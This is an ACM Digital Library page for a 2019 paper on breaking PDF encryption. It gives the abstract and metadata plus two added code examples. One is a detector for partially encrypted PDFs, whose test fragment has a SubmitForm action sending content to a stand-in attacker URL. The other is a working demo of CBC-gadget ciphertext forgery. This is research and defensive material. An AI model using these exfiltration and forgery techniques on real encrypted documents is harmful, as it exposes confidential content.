DOI: 10.1145/3319535.3354214

Practical Decryption exFiltration: Breaking PDF Encryption

Published: 06 November 2019

Abstract

The Portable Document Format, better known as PDF, is one of the most widely used document formats worldwide, and to ensure information confidentiality this file format supports document encryption. In this paper, we analyze PDF encryption and show two novel techniques for breaking the confidentiality of encrypted documents. First, we abuse the PDF feature of partially encrypted documents to wrap the encrypted part of the document within attacker-controlled content and thereby exfiltrate the plaintext once the document is opened by a legitimate user. Second, we abuse a flaw in the PDF encryption specification (ciphertexts carry no integrity protection, so CBC-encrypted content is malleable) to arbitrarily manipulate encrypted content. The only requirement is a single block of known plaintext, and we show that this is fulfilled by design. Our attacks allow the recovery of the entire plaintext of encrypted documents by using exfiltration channels which are based on standard-compliant PDF properties. We evaluated our attacks on 27 widely used PDF viewers and found all of them to be vulnerable. We responsibly disclosed the vulnerabilities and supported the vendors in fixing the issues.
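The first attack in the abstract needs a document that is only partially encrypted and that carries a channel able to send the decrypted part out of the viewer. The following triage heuristic is an added example, not code from the paper or from any vendor; it assumes (as a heuristic, not a rule from the paper) that partial encryption shows up as an /Identity crypt filter or /EncryptMetadata false next to an /Encrypt dictionary, and that an outbound action type (/SubmitForm, /URI, /Launch, /GoToR, /ImportData, /JavaScript) is the exfiltration channel. The PDF fragments and the URL are constructed for the example.

```python
"""Triage heuristic for partially encrypted PDFs with an outbound action.

Added example, not from the PDFex paper. Assumption: a document that
(a) has an /Encrypt dictionary, (b) leaves part of itself unencrypted via an
/Identity crypt filter or /EncryptMetadata false, and (c) carries an action
that can send data off the host deserves a manual look before it is opened.
"""
import re

# PDF action types that can carry document content to a remote party.
OUTBOUND_ACTIONS = ("SubmitForm", "URI", "Launch", "GoToR", "ImportData", "JavaScript")


def _has_name(pdf: bytes, name: str) -> bool:
    # Match a PDF name token exactly: /URI but not /URIBlock, /Encrypt but not /EncryptMetadata.
    return re.search(rb"/" + name.encode() + rb"(?![A-Za-z0-9])", pdf) is not None


def triage(pdf: bytes) -> dict:
    encrypted = _has_name(pdf, "Encrypt")
    # Default stream/string/embedded-file crypt filter set to Identity: those parts stay plaintext.
    identity_filter = re.search(rb"/(StmF|StrF|EFF)\s*/Identity(?![A-Za-z])", pdf) is not None
    plain_metadata = re.search(rb"/EncryptMetadata\s+false", pdf) is not None
    actions = [a for a in OUTBOUND_ACTIONS if _has_name(pdf, a)]
    partial = identity_filter or plain_metadata
    return {
        "encrypted": encrypted,
        "partially_encrypted": partial,
        "outbound_actions": actions,
        "suspicious": encrypted and partial and bool(actions),
    }


# Constructed fragments (not real files): only the objects the heuristic inspects.
FULLY_ENCRYPTED = b"""
5 0 obj << /Filter /Standard /V 4 /R 4 /Length 128
  /CF << /StdCF << /CFM /AESV2 /AuthEvent /DocOpen /Length 16 >> >>
  /StmF /StdCF /StrF /StdCF >> endobj
trailer << /Root 1 0 R /Encrypt 5 0 R >>
"""

PARTIAL_WITH_SUBMIT = b"""
1 0 obj << /Type /Catalog /Pages 2 0 R
  /OpenAction << /S /SubmitForm /F (http://attacker.example/collect) >> >> endobj
5 0 obj << /Filter /Standard /V 4 /R 4 /Length 128
  /CF << /StdCF << /CFM /AESV2 /AuthEvent /DocOpen /Length 16 >> >>
  /StmF /Identity /StrF /Identity >> endobj
trailer << /Root 1 0 R /Encrypt 5 0 R >>
"""

if __name__ == "__main__":
    for label, doc in (("fully encrypted", FULLY_ENCRYPTED), ("partial + submit", PARTIAL_WITH_SUBMIT)):
        print(label, triage(doc))
```

The check reads raw bytes, so it misses names written with #xx hex escapes and objects packed into compressed object streams; run it on a copy that a real parser has expanded (for instance qpdf's QDF output), and treat a hit as a reason to inspect, not as proof of an attack.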
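The second attack, CBC gadgets built from one known plaintext block, is worth seeing in code. The block below is an added example, not code from the paper: a four-round Feistel network over SHA-256 stands in for AES (the gadget construction depends only on CBC chaining, so it applies unchanged to AES-CBC as used by PDF's AESV2 and AESV3 crypt filters), the "encrypted content stream" is constructed, and the assumption that the attacker knows plaintext block 0 is a modelling choice for the demo; where PDF supplies the known block by design is the paper's contribution and is not modelled here.

```python
"""CBC gadgets from a single known plaintext block (added example, not PDFex code).

A Feistel cipher on SHA-256 stands in for AES; the attack never touches the key.
"""
import hashlib
import os

BLOCK = 16
ROUNDS = 4


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def _round(key: bytes, rnd: int, half: bytes) -> bytes:
    # Keyed round function (a PRF) over one 8-byte half block.
    return hashlib.sha256(key + bytes([rnd]) + half).digest()[:8]


def block_encrypt(key: bytes, block: bytes) -> bytes:
    l, r = block[:8], block[8:]
    for i in range(ROUNDS):
        l, r = r, xor(l, _round(key, i, r))
    return l + r


def block_decrypt(key: bytes, block: bytes) -> bytes:
    l, r = block[:8], block[8:]
    for i in reversed(range(ROUNDS)):
        l, r = xor(r, _round(key, i, l)), l
    return l + r


def cbc_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    assert len(plaintext) % BLOCK == 0, "caller pads to a block multiple"
    out, prev = [], iv
    for i in range(0, len(plaintext), BLOCK):
        prev = block_encrypt(key, xor(plaintext[i:i + BLOCK], prev))
        out.append(prev)
    return b"".join(out)


def cbc_decrypt(key: bytes, iv: bytes, ciphertext: bytes) -> bytes:
    # No MAC and no padding check: the viewer decrypts whatever it is handed.
    out, prev = [], iv
    for i in range(0, len(ciphertext), BLOCK):
        c = ciphertext[i:i + BLOCK]
        out.append(xor(block_decrypt(key, c), prev))
        prev = c
    return b"".join(out)


def cbc_gadget(c_prev: bytes, c_known: bytes, p_known: bytes, p_target: bytes):
    """One gadget: from (C_{i-1}, C_i) with known P_i, build (C', C_i) that
    decrypts to p_target. D_k(C_i) = P_i xor C_{i-1} whatever precedes C_i,
    so setting C' = C_{i-1} xor P_i xor p_target yields p_target."""
    assert len(p_target) == BLOCK
    return xor(xor(c_prev, p_known), p_target), c_known


def forge_ciphertext(c_prev: bytes, c_known: bytes, p_known: bytes, blocks: list):
    """Chain gadgets. Returns (iv, ciphertext) whose CBC decryption reads
    blocks[0], junk, blocks[1], junk, ..., blocks[-1]: each modified predecessor
    block itself decrypts to uncontrollable junk, which the attacker has to hide
    in PDF syntax (for example inside a comment or a string literal)."""
    iv, first = cbc_gadget(c_prev, c_known, p_known, blocks[0])
    ct = [first]
    for b in blocks[1:]:
        prev, c = cbc_gadget(c_prev, c_known, p_known, b)
        ct += [prev, c]
    return iv, b"".join(ct)


def demo() -> dict:
    key, iv = os.urandom(16), os.urandom(16)  # victim's file key and IV; attacker never sees the key
    # Constructed stand-in for an encrypted content stream, padded to a block multiple.
    secret = b"BT /F1 12 Tf (Top secret salary figures) Tj ET"
    secret += b" " * (-len(secret) % BLOCK)
    ct = cbc_encrypt(key, iv, secret)
    # Assumption for the demo: plaintext block 0 is known to the attacker.
    chosen = [b"(INJECTED BLOCK)", b"( second block )"]
    iv2, ct2 = forge_ciphertext(iv, ct[:BLOCK], secret[:BLOCK], chosen)
    forged = cbc_decrypt(key, iv2, ct2)  # what the victim's viewer renders
    return {"forged": forged, "chosen": chosen}


if __name__ == "__main__":
    print(demo()["forged"])
```

Every attacker-controlled block costs one junk block, which is why the paper pairs the gadgets with PDF syntax that tolerates garbage; the defence is not a stronger block cipher but authenticated encryption, which PDF's standard security handler does not provide.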

Supplementary Material

WEBM File (p15-ising.webm)


Published In

CCS '19: Proceedings of the 2019 ACM SIGSAC Conference on Computer and Communications Security
November 2019
2755 pages
ISBN:9781450367479
DOI:10.1145/3319535
Permission to make digital or hard copies of all or part of this work for personal or classroom use is granted without fee provided that copies are not made or distributed for profit or commercial advantage and that copies bear this notice and the full citation on the first page. Copyrights for components of this work owned by others than the author(s) must be honored. Abstracting with credit is permitted. To copy otherwise, or republish, to post on servers or to redistribute to lists, requires prior specific permission and/or a fee. Request permissions from permissions@acm.org.


Publisher

Association for Computing Machinery

New York, NY, United States


Author Tags

  1. CBC gadgets
  2. CBC malleability
  3. PDF
  4. direct exfiltration
  5. encryption

Qualifiers

  • Research-article

Funding Sources

  • European Commission
  • European Regional Development Fund North Rhine-Westphalia (EFRE.NRW)
  • German Research Foundation (DFG)
  • State of North Rhine-Westfalia

Conference

CCS '19

Acceptance Rates

CCS '19 Paper Acceptance Rate 149 of 934 submissions, 16%;
Overall Acceptance Rate 1,261 of 6,999 submissions, 18%


Cited By

  • (2023) DISV: Domain Independent Semantic Validation of Data Files. 2023 IEEE Security and Privacy Workshops (SPW), 163-174. doi:10.1109/SPW59333.2023.00020 (online May 2023)
  • (2022) Research Report: Strengthening Weak Links in the PDF Trust Chain. 2022 IEEE Security and Privacy Workshops (SPW), 152-167. doi:10.1109/SPW54247.2022.9833889 (online May 2022)
  • (2022) Radian: Leveraging PKI for Long-Term Validation Enabled Digital Academic Testimonials - A Case-Study. 2022 IEEE International Conference on Public Key Infrastructure and its Applications (PKIA), 1-8. doi:10.1109/PKIA56009.2022.9952257 (online 9 Sep 2022)
  • (2021) Accessible Formal Methods for Verified Parser Development. 2021 IEEE Security and Privacy Workshops (SPW), 142-151. doi:10.1109/SPW53761.2021.00028 (online May 2021)
  • (2021) Breaking the Specification: PDF Certification. 2021 IEEE Symposium on Security and Privacy (SP), 1485-1501. doi:10.1109/SP40001.2021.00110 (online May 2021)
  • (2021) Detecting Malicious PDF Documents Using Semi-Supervised Machine Learning. Advances in Digital Forensics XVII, 135-155. doi:10.1007/978-3-030-88381-2_7 (online 15 Oct 2021)
  • (2020) Mitigation of Attacks on Email End-to-End Encryption. Proceedings of the 2020 ACM SIGSAC Conference on Computer and Communications Security, 1647-1664. doi:10.1145/3372297.3417878 (online 30 Oct 2020)
  • (2020) ACE in Chains: How Risky Is CBC Encryption of Binary Executable Files? Applied Cryptography and Network Security, 187-207. doi:10.1007/978-3-030-57808-4_10 (online 27 Aug 2020)
